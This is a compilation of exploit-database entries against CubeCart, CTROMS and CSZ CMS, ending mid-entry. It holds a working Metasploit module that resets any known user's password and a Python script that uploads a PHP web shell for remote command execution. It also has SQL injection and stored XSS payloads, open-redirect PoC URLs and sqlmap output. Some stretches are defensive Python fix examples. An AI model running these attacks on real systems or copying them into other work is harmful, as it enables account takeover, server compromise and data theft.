
source: https://www.securityfocus.com/bid/51966/info
  
CubeCart is prone to URI-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
  
A successful exploit may aid in phishing attacks; other attacks are possible.
  
CubeCart 3.0.20 is vulnerable; other versions may also be affected. 

http://www.example.com/cube3.0.20/switch.php?r=//yehg.net/&lang=es 
            

http://www.example.com/cube3.0.20/admin/login.php?goto=//yehg.net
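Both PoC URLs above pass a protocol-relative value (`//yehg.net`) in a redirect parameter, which a check like "does it start with http://" would wave through. The following Python is an added example, not CubeCart code: a redirect-target validator that only accepts root-relative paths on the site's own origin, with `SITE_ORIGIN` being a constructed host.

```python
from urllib.parse import urljoin, urlsplit

# Constructed origin for the shop (hypothetical host, not from the advisory).
SITE_ORIGIN = "https://shop.example.com/"


def is_safe_redirect(target):
    """True only if `target` is a root-relative path on this site.

    Rejects the forms in the PoCs above (protocol-relative '//host' and any
    absolute URL) plus the usual variants: backslashes, which browsers treat
    as slashes in the authority, surrounding whitespace, control characters,
    and bare scheme targets such as 'javascript:'.
    """
    if not target or target != target.strip():
        return False
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        return False
    normalised = target.replace("\\", "/")
    if normalised.startswith("//"):
        return False
    parts = urlsplit(normalised)
    if parts.scheme or parts.netloc:
        return False
    # Require a root-relative path; "page.php" or "../x" would resolve against
    # whatever URL issued the redirect and is not worth reasoning about.
    return parts.path.startswith("/")


def resolve_redirect(target, fallback="/"):
    """Absolute URL to send in the Location header; unsafe targets fall back
    to the home page instead of being passed through."""
    path = target.replace("\\", "/") if is_safe_redirect(target) else fallback
    return urljoin(SITE_ORIGIN, path)


if __name__ == "__main__":
    for candidate in ("/cart.php?lang=es", "//yehg.net/", "http://yehg.net/", "/\\yehg.net"):
        print(repr(candidate), "->", resolve_redirect(candidate))
```

The check deliberately refuses relative paths without a leading slash as well; a switch or login page has no reason to redirect anywhere but to a known location on the same host, so the allow-list is kept as narrow as possible.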
            
CubeCart Multiple Vulnerabilities

Vendor: Devellion Limited
Product: CubeCart
Version: <= 3.0.12
Website: http://www.cubecart.com

BID: 19782 
CVE: CVE-2006-4525 
OSVDB: 28279 28280 28281 
SECUNIA: 21659 

Description:
CubeCart is a very popular web application written in PHP that allows an individual to set up a fully functioning online e-commerce store. Unfortunately, CubeCart is vulnerable to cross-site scripting attacks, SQL injection attacks, and possible remote code execution because an attacker is able to include arbitrary PHP code. An updated version of CubeCart has been released and all users are encouraged to upgrade as soon as possible.


SQL injection:
There is an SQL injection in CubeCart due to an uninitialized array being used in an sql query. Let's have a look at a section of the vulnerable code from viewCat.inc.php 
$searchwords = split("[ ,]", treatGet($_GET['searchStr']));
foreach ($searchwords as $word) {
    $searchArray[] = $word;
}

$noKeys = count($searchArray);
$like = "";
for ($i = 0; $i < $noKeys; $i++) {
    $ucSearchTerm = strtoupper($searchArray[$i]);
    if (($ucSearchTerm !== "AND") && ($ucSearchTerm !== "OR")) {
        $like .= "(name LIKE '%".$searchArray[$i]."%' OR description LIKE '%".$searchArray[$i]."%' OR productCode LIKE '%".$searchArray[$i]."%') OR ";
    }
}

As seen in the above code, the searchArray array is never initialized, thus allowing an attacker to inject arbitrary elements into the array. To exploit this issue all an attacker would have to do is append searchArray[]=SQL to their search request. Of course an attacker would need to replace "SQL" with a valid SQL Statement. 
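To make the mechanism concrete, here is an added Python example (not CubeCart code) that models the PHP above against an in-memory SQLite table: `collect_search_words` reproduces the register_globals effect of a pre-seeded `searchArray`, `search_unsafe` is a port of the string-concatenated query, and `search_safe` is the hardened form with bound parameters and escaped LIKE wildcards. The product rows and the `inventory` table name are constructed for the demonstration.

```python
import re
import sqlite3

# Constructed catalogue standing in for CubeCart's inventory table.
SAMPLE_PRODUCTS = [
    ("Red mug", "Ceramic mug, 300 ml", "MUG-R"),
    ("Blue mug", "Ceramic mug, 300 ml", "MUG-B"),
    ("Staff-only item", "Not for sale", "INTERNAL-1"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE inventory (name TEXT, description TEXT, productCode TEXT)")
    conn.executemany("INSERT INTO inventory VALUES (?, ?, ?)", SAMPLE_PRODUCTS)
    return conn


def collect_search_words(params):
    """Models what register_globals does to the PHP above: a request parameter
    named searchArray already populates the array before the split search
    words are appended, because the script never initialises it."""
    search_array = list(params.get("searchArray", []))
    search_array.extend(re.split(r"[ ,]", params.get("searchStr", "")))
    return search_array


def search_unsafe(conn, search_array):
    """Port of the vulnerable query construction: words are concatenated
    straight into the SQL text."""
    like = ""
    for word in search_array:
        if word.upper() not in ("AND", "OR"):
            like += ("(name LIKE '%" + word + "%' OR description LIKE '%" + word +
                     "%' OR productCode LIKE '%" + word + "%') OR ")
    if not like:
        return []
    sql = "SELECT name FROM inventory WHERE " + like[:-len(" OR ")]
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, search_array):
    """Hardened form: the SQL text is fixed, every word travels as a bound
    parameter, and LIKE wildcards inside the word are escaped."""
    clauses, params = [], []
    for word in search_array:
        if not word or word.upper() in ("AND", "OR"):
            continue
        escaped = word.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
        clauses.append("(name LIKE ? ESCAPE '\\' OR description LIKE ? ESCAPE '\\' "
                       "OR productCode LIKE ? ESCAPE '\\')")
        params.extend(["%" + escaped + "%"] * 3)
    if not clauses:
        return []
    sql = "SELECT name FROM inventory WHERE " + " OR ".join(clauses)
    return [row[0] for row in conn.execute(sql, params)]


if __name__ == "__main__":
    request = {"searchStr": "mug", "searchArray": ["x%') OR 1=1 OR ('"]}
    words = collect_search_words(request)
    print("unsafe:", search_unsafe(make_db(), words))   # every row leaks
    print("safe:  ", search_safe(make_db(), words))     # only the mugs
```

Initialising `$searchArray = array();` before the loop closes the register_globals hole, but it leaves the concatenated `LIKE` clause intact; the parameterised query is the fix that survives the next uninitialised variable.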


Cross Site Scripting:
There is also a cross site scripting issue in CubeCart due to an uninitialized array being used. The "links" array is never initialized, and an attacker may use this to inject arbitrary HTML or JavaScript into the rendered template, thus allowing for cross site scripting attacks. It should be noted that register_globals must be on in order to exploit this issue.


Arbitrary File Inclusion:
There is a very dangerous file inclusion issue that can be used to remotely execute code on a target system as long as magic_quotes_gpc is disabled (the default PHP setting). This is due to the improper use of a regular expression to validate the vulnerable variable. Below is code from the vulnerable file named gateway.inc.php
// sanitise gateway variable
if ($basket == TRUE && isset($_POST['gateway']) && eregi("[0-9a-z_-]", $_POST['gateway'])) {
    //$basket = $cart->setVar($basket['shipCost'],"shipCost");
    $basket = $cart->setVar($_POST['gateway'], "gateway");

    include("modules/gateway/".$_POST['gateway']."/transfer.inc.php");
}

The above regular expression actually only checks for the presence of an alphanumeric character (dashes and underscores also) somewhere in the "gateway" variable. So, as long as an attacker doesn't specify a string consisting only of illegal characters, the vulnerability is possible to exploit. Successful exploitation allows for remote PHP code execution via the inclusion of arbitrary files.
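The difference between "contains an allowed character" and "consists only of allowed characters" is easiest to see side by side. The Python below is an added example, not CubeCart code: it models the `eregi()` search with `re.search`, the intended whole-string check with `re.fullmatch`, and adds the allow-list of installed modules that makes the include path safe even if the regex is wrong again later. `INSTALLED_GATEWAYS` is a constructed set.

```python
import re

# Gateway modules we treat as installed (constructed for the example).
INSTALLED_GATEWAYS = {"paypal", "worldpay", "bank_transfer"}

# eregi("[0-9a-z_-]", $x) is a case-insensitive *search*: it succeeds as soon
# as any single character of $x falls inside the class.
UNANCHORED = re.compile(r"[0-9a-z_-]", re.IGNORECASE)
# What the check was meant to express: every character is inside the class.
ANCHORED = re.compile(r"[0-9a-z_-]+", re.IGNORECASE)


def passes_original_check(gateway):
    """The page's eregi() test."""
    return UNANCHORED.search(gateway) is not None


def passes_anchored_check(gateway):
    """Whole-string test; an empty string fails because '+' needs one char."""
    return ANCHORED.fullmatch(gateway) is not None


def select_gateway(gateway):
    """Defence in depth: whole-string syntax check, then an allow-list of
    modules that actually exist. Returns the include path (built the same
    way the PHP does) or None when the value is refused."""
    if not passes_anchored_check(gateway):
        return None
    if gateway not in INSTALLED_GATEWAYS:
        return None
    return "modules/gateway/" + gateway + "/transfer.inc.php"


if __name__ == "__main__":
    for value in ("paypal", "../../uploads/avatar.jpg", "../"):
        print(repr(value), "original:", passes_original_check(value),
              "anchored:", passes_anchored_check(value),
              "include:", select_gateway(value))
```

The allow-list is the stronger of the two controls: it turns the user-supplied value into a key rather than a path fragment, so no regex subtlety (anchors, multiline `$`, locale-dependent classes) can reopen the inclusion.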


Solution:
CubeCart were very quick to release an updated version, and users are encouraged to upgrade as soon as possible. 


Credits:
James Bercegay of the GulfTech Security Research Team
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CTROMS Terminal OS - Port Portal "Password Reset" Authentication Bypass',
      'Description'    => %q{
        This module exploits an authentication bypass in CTROMS, triggered by password reset verification code disclosure.
        In order to exploit this vulnerability, the username must be known.
        Exploiting this vulnerability creates a new password for the user you specify and presents it to you.

        The "verification code" and "cookie generate" functions required to reset the password contain the vulnerability.
        When the "userId" parameter is posted to "getverificationcode.jsp", a verification code is sent to the account's phone number for password reset.
        However, the verification code written to the database is also reflected in the response to that request.
        The first vector is to use this verification code.
        The second vector is the "rand" cookie values returned in this request. These values are MD5 hashes.
        If these values are assigned in the response, the password reset can be done via these cookie values.
        Ex: [ Cookie: 6fb36ecf2a04b8550ba95603047fe85=fae0bKBGtKBKtKh.wKA.vLBmuLxmuM.; 34d1c350632806406ecc517050da0=b741baa96686a91d4461145e40a9c2df ]
      },
      'References'     =>
        [
          [ 'CVE', '' ],
          [ 'URL', 'https://www.pentest.com.tr/exploits/CTROMS-Terminal-OS-Port-Portal-Password-Reset-Authentication-Bypass.html' ],
          [ 'URL', 'https://www.globalservices.bt.com' ]
        ],
      'Author'         =>
        [
          'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => "March 2 2020",
      'DefaultOptions' => { 'SSL' => true }
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('USERNAME', [true, 'Username']),
        OptString.new('PASSWORD', [true, 'Password for the reset', Rex::Text.rand_text_alphanumeric(12)])
      ])
  end

  def peer
    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end

  def check
    begin
      res = send_request_cgi({
        'method'  => 'POST',
        'ctype'   => 'application/x-www-form-urlencoded',
        'uri'     => normalize_uri(target_uri.path, 'getverificationcode.jsp'),
        'headers' => {
          'Referer' => "#{peer}/verification.jsp"
        },
        'data'    => "userId=#{Rex::Text.rand_text_alphanumeric(8)}"
      })
    rescue
      return Exploit::CheckCode::Unknown
    end

    # The vulnerable endpoint echoes the "rand" values back in the response body
    if res && res.code == 200 && res.body.include?('"rand"')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def run
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    # Confirm the supplied username exists before attempting the reset
    res = send_request_cgi({
      'method'  => 'POST',
      'ctype'   => 'application/x-www-form-urlencoded',
      'uri'     => normalize_uri(target_uri.path, 'getuserinfo.jsp'),
      'headers' => {
        'Referer' => "#{peer}/verification.jsp"
      },
      'data'    => "userId=#{datastore['USERNAME']}"
    })

    if res && res.code == 200 && res.body.include?('"mobileMask"')
      print_good("Excellent! password resettable for #{datastore['USERNAME']}")
    else
      fail_with(Failure::NotVulnerable, 'The user you specified is not valid')
    end

    # Request a verification code; the response carries the "rand" cookies
    res = send_request_cgi({
      'method'  => 'POST',
      'ctype'   => 'application/x-www-form-urlencoded',
      'uri'     => normalize_uri(target_uri.path, 'getverificationcode.jsp'),
      'headers' => {
        'Referer' => "#{peer}/verification.jsp"
      },
      'data'    => "userId=#{datastore['USERNAME']}"
    })
    fail_with(Failure::Unreachable, 'No response to the verification code request') unless res

    @cookie = res.get_cookies

    # Submit the new password together with the cookies obtained above
    res = send_request_cgi({
      'method'  => 'POST',
      'ctype'   => 'application/x-www-form-urlencoded',
      'uri'     => normalize_uri(target_uri.path, 'getresult.jsp'),
      'cookie'  => @cookie,
      'headers' => {
        'Referer' => "#{peer}/verification.jsp"
      },
      'data'    => "userId=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}"
    })

    if res && res.body.include?('result":10')
      print_good('boom! Password successfully reset.')
      print_good("Username : #{datastore['USERNAME']}")
      print_good("Password : #{datastore['PASSWORD']}")
    else
      fail_with(Failure::BadConfig, "Unknown error while resetting the password. Response: #{res ? res.code : 'none'}")
    end
  end
end
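The root cause the module describes is a reset endpoint that returns the verification code (and usable cookie material) to whoever asked for it, so the out-of-band channel never matters. The Python below is an added example, not CTROMS or Metasploit code, showing the shape a reset flow should have: the HTTP-level response is the same for existing and non-existing users and carries no code, only a hash of the code is stored server-side, and verification is single-use, time-limited, attempt-limited and constant-time. `USERS`, the SMS outbox and the SHA-256 password store are constructed stand-ins.

```python
import hashlib
import hmac
import secrets
import time

CODE_TTL_SECONDS = 300   # a reset code is valid for five minutes
MAX_ATTEMPTS = 5         # wrong guesses allowed before the code is discarded

# Constructed user directory (hypothetical): username -> phone number on file.
USERS = {"jdoe": "+15555550123"}
PASSWORD_HASHES = {}

# Server-side state only: username -> {"hash", "expires", "attempts"}.
# The code itself is never stored in clear and never returned to the caller.
_pending = {}

# Stand-in for the SMS gateway; a real deployment hands the code to the
# out-of-band channel here and nowhere else.
_sms_outbox = []


def _hash(value):
    return hashlib.sha256(value.encode()).hexdigest()


def last_sms():
    """(phone, code) of the most recent message; exists only so the demo can read it."""
    return _sms_outbox[-1]


def request_reset(user_id, now=None):
    """Step 1: issue a code. The response is identical whether or not the
    user exists, so the endpoint cannot be used to enumerate accounts."""
    now = time.time() if now is None else now
    phone = USERS.get(user_id)
    if phone is not None:
        code = f"{secrets.randbelow(10**6):06d}"
        _pending[user_id] = {"hash": _hash(code),
                             "expires": now + CODE_TTL_SECONDS,
                             "attempts": MAX_ATTEMPTS}
        _sms_outbox.append((phone, code))
    return {"result": "sent"}


def complete_reset(user_id, code, new_password, now=None):
    """Step 2: accept the code once, within its lifetime, with a bounded
    number of guesses, compared in constant time."""
    now = time.time() if now is None else now
    entry = _pending.get(user_id)
    if entry is None:
        return False
    if now > entry["expires"] or entry["attempts"] <= 0:
        _pending.pop(user_id, None)
        return False
    entry["attempts"] -= 1
    if not hmac.compare_digest(entry["hash"], _hash(code)):
        return False
    _pending.pop(user_id, None)                       # single use
    PASSWORD_HASHES[user_id] = _hash(new_password)    # demo only; use argon2/bcrypt in production
    return True


if __name__ == "__main__":
    print(request_reset("jdoe"))            # {'result': 'sent'}: no code, no mask
    phone, code = last_sms()                # what only the phone owner would see
    print(complete_reset("jdoe", "000000", "NewPass1") or "wrong code refused")
    print(complete_reset("jdoe", code, "NewPass1"))   # True
```

The attempt counter is what keeps a six-digit code meaningful: without it, the 300-second window is long enough to try every value.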
            
# Title:  CSZCMS v1.3.0 - SQL Injection (Authenticated)
# Author: Abdulaziz Almetairy
# Date: 27/01/2024
# Vendor: https://www.cszcms.com/
# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Reference: https://github.com/oh-az
# Tested on: Windows 11, MySQL, Apache


# 1 - Log in to the admin portal

http://localhost/cszcms/admin/login

# 2 - Navigate to General Menu > Member Users.

# 3 - Click the 'View' button next to any username.

# 4 - Intercept the request

GET /cszcms/admin/members/view/1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdss
Upgrade-Insecure-Requests: 1



# 5 - Modify the parameter

/cszcms/admin/members/view/1

to 

/cszcms/admin/members/view/'or(sleep(10))#

and url encode all characters

/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20
            
# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution
# Date: 17/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download
# Version: Version 1.3.0
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS


import os
import zipfile
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options as FirefoxOptions
from selenium.webdriver.firefox.service import Service as FirefoxService
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException
import requests
from time import sleep
import sys
import random
import platform
import tarfile
from io import BytesIO

email = "admin@admin.com" 
password = "password"

class colors:
    OKBLUE = '\033[94m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    CBLACK = '\33[30m'
    CRED = '\33[31m'
    CGREEN = '\33[32m'
    CYELLOW = '\33[33m'
    CBLUE = '\33[34m'
    CVIOLET = '\33[35m'
    CBEIGE = '\33[36m'
    CWHITE = '\33[37m'


color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
                colors.CRED, colors.CBEIGE]
random.shuffle(color_random)


def entryy():
    x = color_random[0] + """

╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯

                <<   CSZ CMS Version 1.3.0 RCE     >>
                <<      CODED BY TMRSWRR           >>
                <<     GITHUB==>capture0x          >>

\n"""
    for c in x:
        print(c, end='')
        sys.stdout.flush()
        sleep(0.0045)
    oo = " " * 6 + 29 * "░⣿" + "\n\n"
    for c in oo:
        print(colors.CGREEN + c, end='')
        sys.stdout.flush()
        sleep(0.0065)

    tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"
    for c in tt:
        print(colors.CWHITE + c, end='')
        sys.stdout.flush()
        sleep(0.0065)
    xx = " " * 6 + 29 * "░⣿" + "\n\n"
    for c in xx:
        print(colors.CGREEN + c, end='')
        sys.stdout.flush()
        sleep(0.0065)

def check_geckodriver():
    current_directory = os.path.dirname(os.path.abspath(__file__))
    geckodriver_path = os.path.join(current_directory, 'geckodriver')

    if not os.path.isfile(geckodriver_path):
        red = "\033[91m"
        reset = "\033[0m"
        print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)
        user_input = input("Would you like to download it now? (yes/no): ").lower()
        if user_input == 'yes':
            download_geckodriver(current_directory)
        else:
            print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)
            sys.exit(1)

def download_geckodriver(directory):

    print("[*] Detecting OS and architecture...")
    os_name = platform.system().lower()
    arch, _ = platform.architecture()

    if os_name == "linux":
        os_name = "linux"
        arch = "64" if arch == "64bit" else "32"
    elif os_name == "darwin":
        os_name = "macos"
        arch = "aarch64" if platform.processor() == "arm" else ""
    elif os_name == "windows":
        os_name = "win"
        arch = "64" if arch == "64bit" else "32"
    else:
        print("[!] Unsupported operating system.")
        sys.exit(1)

    geckodriver_version = "v0.33.0"
    geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"
    ext = "zip" if os_name == "win" else "tar.gz"
    url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"

    print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")
    response = requests.get(url, stream=True)

    if response.status_code == 200:
        print("[*] Extracting GeckoDriver...")
        if ext == "tar.gz":
            with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:
                tar.extractall(path=directory)
        else:   
            with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:
                zip_ref.extractall(directory)
        print("[+] GeckoDriver downloaded and extracted successfully.")
    else:
        print("[!] Failed to download GeckoDriver.")
        sys.exit(1)
        
def create_zip_file(php_filename, zip_filename, php_code):
    try:
        with open(php_filename, 'w') as file:
            file.write(php_code)
        with zipfile.ZipFile(zip_filename, 'w') as zipf:
            zipf.write(php_filename)
        print("[+] Zip file created successfully.")
        os.remove(php_filename)
        return zip_filename
    except Exception as e:
        print(f"[!] Error creating zip file: {e}")
        sys.exit(1)


def main(base_url, command):

    if not base_url.endswith('/'):
        base_url += '/'

    zip_filename = None
    driver = None  # set once the browser starts, so the finally block can check it

    check_geckodriver()
    try:
        firefox_options = FirefoxOptions()
        firefox_options.add_argument("--headless")

        script_directory = os.path.dirname(os.path.abspath(__file__))
        geckodriver_path = os.path.join(script_directory, 'geckodriver')
        service = FirefoxService(executable_path=geckodriver_path)
        driver = webdriver.Firefox(service=service, options=firefox_options)
        print("[*] Exploit initiated.")

        # Login
        driver.get(base_url + "admin/login")
        print("[*] Accessing login page...")
        driver.find_element(By.NAME, "email").send_keys(email)
        driver.find_element(By.NAME, "password").send_keys(password)
        driver.find_element(By.ID, "login_submit").click()
        print("[*] Credentials submitted...")

        try:
            error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")
            if error_message.is_displayed():
                print("[!] Login failed: Invalid credentials.")
                sys.exit(1)  # the finally block closes the browser
        except NoSuchElementException:
            print("[+] Login successful.")

        # File creation
        print("[*] Preparing exploit files...")
        php_code = f"<?php echo system('{command}'); ?>"
        zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)

        driver.get(base_url + "admin/upgrade")
        print("[*] Uploading exploit payload...")
        file_input = driver.find_element(By.ID, "file_upload")
        file_input.send_keys(os.path.join(os.getcwd(), zip_filename))

        # Uploading
        driver.find_element(By.ID, "submit").click()
        WebDriverWait(driver, 10).until(EC.alert_is_present())
        alert = driver.switch_to.alert
        alert.accept()

        # Exploit result
        exploit_url = base_url + "exploit.php"
        response = requests.get(exploit_url)
        print(f"[+] Exploit response:\n\n{response.text}")

    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        if driver is not None:
            driver.quit()
        if zip_filename and os.path.exists(zip_filename):
            os.remove(zip_filename)

if __name__ == "__main__":
    entryy()
    if len(sys.argv) < 3:
        print("Usage: python script.py [BASE_URL] [COMMAND]")
    else:
        main(sys.argv[1], sys.argv[2])
            
# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')
# Date: 2023/08/18
# CVE: CVE-2023-38911
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0
# Description:
# CSZ CMS 1.3.0 is affected by a stored cross-site scripting (XSS) vulnerability that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'YouTube URL' field of a previously created gallery in the 'Gallery' section. It should be noted that the "Name" field used when creating a gallery was previously vulnerable to XSS, but this was resolved in the current version 1.3.0; the vulnerability found here affects the "YouTube URL" field within the created gallery.

# Steps to reproduce Stored XSS:

Go to url http://localhost/admin/plugin/gallery/edit/2.

After logging into the panel, go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery]; the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2].
Edit the Gallery that was just created and observe that arbitrary web scripts or HTML can be injected into the "YouTube URL" field.

With the following payload we can achieve the XSS

Payload:

<div><p title="</div><svg/onload=alert(document.domain)>">


#PoC Request:

POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/plugin/gallery/edit/2
Upgrade-Insecure-Requests: 1

gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add
            
# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )
# Date: 2023/08/18
# CVE: CVE-2023-38910
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0
# Description:
# CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Widget' section, after choosing the carousel widget created earlier, in the plugin's 'Photo URL' and 'YouTube URL' fields.

# Steps to reproduce Stored XSS:

Go to url http://localhost/admin/carousel.

Edit the Carousel that was created and observe that arbitrary web scripts or HTML can be injected into the "YouTube URL" and "Photo URL" fields.
HTML code can be injected directly.

With the following payload we can achieve the XSS.

Payload:

<div><p title="</div><svg/onload=alert(document.domain)>">


#PoC Request:


POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/carousel/edit/3
Upgrade-Insecure-Requests: 1

carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add
            
# Exploit Title: CSZ CMS 1.3.0 - 'Multiple' Blind SQLi
# Date: 2021-04-22
# Exploit Author: Dogukan Dincer
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Version: 1.3.0
# Tested on: Kali Linux, Windows 10, PHP 7.2.4, Apache 2.4

# Discovery of Vulnerability

- First go to the CSZ CMS web page.
- Then go to the http://yourhost/plugin/article directory on the CMS.
- To see the error-based SQLi vulnerability, enter the ' character in the search section.
- It is determined that the "p" parameter creates the vulnerability.
- Databases can be accessed with manual or automated tools.

# Proof of Concept

http://127.0.0.1/csz-cms/plugin/article/search?p=1'") UNION ALL SELECT CONCAT(0x717a7a6b71,0x5449414d6c63596c746759764a614d64727476796366686f4e6a7a474c4a414d6b616a4269684956,0x716a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

# Sqlmap output:

Parameter: p (GET)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: p=1'") AND EXTRACTVALUE(8555,CONCAT(0x5c,0x717a7a6b71,(SELECT (ELT(8555=8555,1))),0x716a717a71))-- OUUO

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=1'") AND (SELECT 3910 FROM (SELECT(SLEEP(5)))qIap)-- ogLS
            
# Exploit Title: CSZ CMS 1.2.9 - Multiple Cross-Site Scripting
# Date: 2020/12/28
# Exploit Author: SunCSR
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.2.9
# Tested on: CSZ CMS 1.2.9

1. Reflected XSS
Go to url http://localhost/pluginabc%22%2Dalert%28origin%29%2D%22abc

2. Stored XSS

Use an editor account with rights to manage banners, plugins.

+ Banner Manager:
    - Add or edit banner:
    Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Note field: <noframes><p title="</noframes><svg/onload=alert(origin)>">

+ Plugin Manager:
